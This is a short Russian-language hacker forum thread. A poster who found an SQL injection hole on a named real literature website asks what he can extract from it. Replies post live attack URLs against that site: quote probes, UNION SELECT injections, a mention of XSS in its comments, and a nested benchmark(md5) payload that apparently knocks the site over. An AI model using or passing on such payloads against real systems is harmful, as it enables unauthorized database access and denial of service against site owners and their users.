здрасти.
такое дело.
пхп я знаю, sql тоже, с БД работаю каждый день.

нашёл такой вот косяк:
http://litprom.ru/text.phtml?storycode=23511'
что я вообще могу с этого поиметь?
дайте хоть подсказку, опытные хацкеры :)
не хочу там ничего уронить, просто добиться хоть чего-то, для осознания собственной значимости гыгы

http://litprom.ru/text.phtml?storycode=23511+union+select+1/*
только вывода я добится не смог (( но попытатся можно ..
иль просто вслепую, через ascii ..

Подстава это :-D
http://litprom.ru/text.phtml?storycode=-1+union+select+1/*

И еще в каментах xss

_http://litprom.ru/text.phtml?storycode=-23511'

:D Смешная ссылочка))))

а я с начала не поверил...
http://litprom.ru/text.phtml?storycode=5+union+select+benchmark(9999 99999,benchmark(999999999,md5(now())))/*

блин он кажись сломался:(((